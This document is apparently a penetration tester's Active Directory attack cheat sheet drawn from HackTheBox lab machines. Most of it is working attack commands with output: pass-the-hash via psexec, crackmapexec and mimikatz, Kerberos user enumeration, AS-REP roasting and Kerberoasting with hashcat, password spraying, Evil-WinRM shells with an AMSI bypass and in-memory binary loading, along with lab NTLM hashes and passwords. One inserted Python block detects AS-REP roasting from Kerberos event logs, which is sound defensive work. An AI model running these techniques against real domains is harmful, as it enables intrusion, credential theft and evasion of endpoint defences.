# Exploiting AD

{% hint style="info" %} nice cheatsheet https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet {% endhint %}

Try to log in as administrator with the NTLM hash instead of a password (pass-the-hash):

```
psexec.py administrator@dead:beef::b885:d62a:d679:573f -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe -port 445
```

## Validate users against AD

Kerbrute is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication.

First you need to add the host to /etc/hosts.

`-t 100` increases the number of threads to 100.

```
echo "10.10.174.211 spookysec.local" | sudo tee -a /etc/hosts
~/tools/kerbrute userenum -d spookysec.local --dc spookysec.local users -t 100
```

```
~/tools/kerbrute userenum -d htb.local --dc apt.htb users -t 100
```

```
# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
dead:beef::b885:d62a:d679:573f apt.htb htb.local
```

## Abusing Kerberos

### ASREPRoasting

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASREPRoasting is possible when a user account has the flag "Does not require Kerberos preauthentication" set (the UF_DONT_REQUIRE_PREAUTH bit in userAccountControl). This means that a client does not need to prove knowledge of the account's password before requesting a Kerberos ticket (AS-REP) for that account.

### Retrieving Kerberos Tickets

Impacket has a tool called GetNPUsers.py (located in impacket/examples/GetNPUsers.py) that will allow us to query AS-REP-roastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames, which we enumerated previously via Kerbrute.

```
/home/kali/impacket/build/scripts-3.9/GetNPUsers.py spookysec.local/ -no-pass -usersfile valid_users
```

Or loop over a user list, one request per user; accounts that still require pre-authentication are reported on a `[-]` line:

```
for user in $(cat forest_users); do GetNPUsers.py -no-pass -dc-ip 10.129.146.146 htb/${user} | grep -v Impacket; done
[*] Getting TGT for Administrator
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:539f1ac4ce220e575438060bd3699a29$c1a1596aef210a178e49eb968451a3c49f65f5dc024e5786706444b2fdeb3d60f0dae4b8ae4cb2cfb2c1cbd16e71f9f58ab71f1dc3502abad2d7757807461078048414d8dc500e04fa07e1dd1d60282e422f4fd9a03c5e66616ca46f8e3be0271165cb36871052af7a5bfd462c0d672a74b387b4674af980ad6509f1779c5860f02806f3a437d6256fe2fd9b3da60cf61471638b9eede87aba528c5a4df1907cf1b9e2e38ca61b4400c7526909772275283830ecb6117cda802ed788c1c4f7d475aae972aa544bcbeb3c80e6267afeb123067249d2fd944cb38d823d5ab10d11
```
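Defender-side counterpart to the Kerbrute and GetNPUsers steps above, as an added example that is not part of these notes or of either tool: it triages records shaped like Windows Security event 4768 (a Kerberos TGT was requested). A request that succeeded with pre-authentication type 0 is a TGT issued to an account with UF_DONT_REQUIRE_PREAUTH set, which is exactly the AS-REP the `$krb5asrep$23$` string above encodes (etype 23 is RC4-HMAC); a burst of result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source is what user enumeration against a wordlist leaves behind. The sample events, the threshold and the function names are constructed for the example.

```python
"""Triage of Kerberos TGT request records (Windows Security event 4768).

Added example for these notes, not tooling from the page. Field names
follow the 4768 event; every value below is constructed.
"""
from collections import Counter

# The userAccountControl bit named in the GetNPUsers output above.
UF_DONT_REQUIRE_PREAUTH = 0x400000

# 4768 result code for a user that does not exist (KDC_ERR_C_PRINCIPAL_UNKNOWN).
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6

# Kerberos encryption type 23 (RC4-HMAC), the "23" in $krb5asrep$23$.
ETYPE_RC4_HMAC = 0x17

# Constructed 4768 records. PreAuthType 0 means the AS-REQ carried no
# pre-authentication data; failed requests carry no pre-auth or etype fields.
SAMPLE_4768 = [
    {"TargetUserName": "svc-alfresco", "IpAddress": "10.10.14.5",
     "PreAuthType": 0, "TicketEncryptionType": ETYPE_RC4_HMAC, "Status": 0x0},
    {"TargetUserName": "Administrator", "IpAddress": "10.10.14.5",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0x0},
    {"TargetUserName": "jsmith", "IpAddress": "10.10.14.5",
     "PreAuthType": None, "TicketEncryptionType": None, "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN},
    {"TargetUserName": "admin2", "IpAddress": "10.10.14.5",
     "PreAuthType": None, "TicketEncryptionType": None, "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN},
    {"TargetUserName": "backup", "IpAddress": "10.10.14.5",
     "PreAuthType": None, "TicketEncryptionType": None, "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN},
    {"TargetUserName": "test", "IpAddress": "10.10.14.5",
     "PreAuthType": None, "TicketEncryptionType": None, "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN},
    # A single typo from another host is not enumeration.
    {"TargetUserName": "typo.user", "IpAddress": "10.10.20.9",
     "PreAuthType": None, "TicketEncryptionType": None, "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN},
]


def preauth_disabled(user_account_control: int) -> bool:
    """True when an account's userAccountControl has DONT_REQUIRE_PREAUTH set;
    this is the directory-side check for the accounts GetNPUsers.py reports."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


def asrep_roastable_logons(events):
    """Accounts issued a TGT (Status 0) without any pre-authentication.

    Returns sorted (user, source_ip, rc4) tuples; rc4 is True when the
    ticket used RC4-HMAC, the etype the $krb5asrep$23$ format encodes.
    """
    hits = {
        (e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"] == ETYPE_RC4_HMAC)
        for e in events
        if e["Status"] == 0 and e["PreAuthType"] == 0
    }
    return sorted(hits)


def enumeration_sources(events, threshold=3):
    """Source IPs that produced at least `threshold` unknown-principal errors,
    the footprint of a userenum run against a wordlist."""
    counts = Counter(e["IpAddress"] for e in events
                     if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for user, ip, rc4 in asrep_roastable_logons(SAMPLE_4768):
        print(f"TGT without pre-auth: {user} from {ip} (RC4={rc4})")
    for ip, n in enumeration_sources(SAMPLE_4768).items():
        print(f"possible user enumeration from {ip}: {n} unknown principals")
```

The two signals complement each other: `preauth_disabled` is what to run over userAccountControl values pulled from the directory to find roastable accounts before anyone requests them, while the two event functions catch the request itself on the domain controller.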

### Service Principal Names (SPNs)

```
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.129.73.237 -request
```

Crack the SPN (TGS) hash with hashcat:

```
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
```

## Get AD Users

```
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.129.75.99
```

## crackmapexec

With hash:

```
$ crackmapexec smb apt.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f
SMB         apt.htb         445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:2de80758521541d19cabba480b260e8f STATUS_LOGON_FAILURE 
```

With password:

```
kali@kali:~/htb$ crackmapexec smb 10.129.96.155 -u marko -p 'Welcome123!' --continue-on-success
```

Or try with a list of hashes. Be aware that if the box has wail2ban installed, it will block this kind of brute-force attack; you might have to reset the box to get it back.

```
$ crackmapexec smb htb.local -u henry.vinson -H hashes
SMB         apt.htb         445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb STATUS_LOGON_FAILURE 
SMB         apt.htb         445    APT              [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE 
```

Pass-the-hash from mimikatz (`sekurlsa::pth`), spawning a PowerShell that runs as the user:

```
sekurlsa::pth /user:henry.vinson /domain:htb.local /dc:htb.local /ntlm:e53d87d42adaa3ca32bdb34a876cbffb /command:powershell
```

## Password Spraying with crackmapexec

```
kali@kali:~/htb$ crackmapexec smb 10.129.96.155  -u resolute_users -p 'Welcome123!' --continue-on-success
SMB         10.129.96.155   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.129.96.155   445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE 
```

## Zerologon

https://github.com/risksense/zerologon

## Getting a shell

```
kali@kali:~$ evil-winrm -i htb.local -u henry.vinson_adm -p 'G1#Ny5@2dvht'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
```

With Evil-WinRM you can also bypass Windows Defender:

```
*Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\local\temp> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /    
        \/                               \/          \/       \/         \/      
              By: CyberVaca, OscarAkaElvis, Laox @Hackplayers

[+] Bypass-4MSI
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary

*Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\local\temp> Bypass-4MSI
[+] Patched! :D
```

Now I can use Invoke-Binary to load an EXE from my system into memory:

```
*Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\local\temp> Invoke-Binary /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe
...[snip]...
```

This method of running does seem to cache all the output and then dump it once the process is complete, so it can take some patience to wait for the output to come.

## wmiexec.py

```
wmiexec.py active.htb/administrator:[email protected]
```

## psexec.py

```
psexec.py active.htb/administrator:[email protected]
```

## runas

From a Windows machine, in cmd:

```
runas /netonly /user:active.htb\svc_tgs cmd

dir \\10.129.75.99\Users
```

## Check PowerShell history

```
*Evil-WinRM* PS C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline> ls


    Directory: C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/10/2020  10:58 AM            458 ConsoleHost_history.txt

*Evil-WinRM* PS C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline> cat ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
```

According to the docs, an LmCompatibilityLevel of 2 means:

> Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.

NTLMv1 is insecure and can be abused. I'll verify it is set that way on APT:

```
*Evil-WinRM* PS C:\> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel


lmcompatibilitylevel : 2
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
PSChildName          : Lsa
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry
```

## Enumerate registry

When a user logs in, their registry hive is mounted at HKCU, which is unique to each user. However, user hives can also be accessed via the HKEY_USERS (HKU) hive, which stores registry entries for all users on the system. Impacket's reg.py can be used to enumerate the registry remotely:

```
reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/[email protected] query -keyName HKU\\Software\\GiganticHostingManagementSystem
```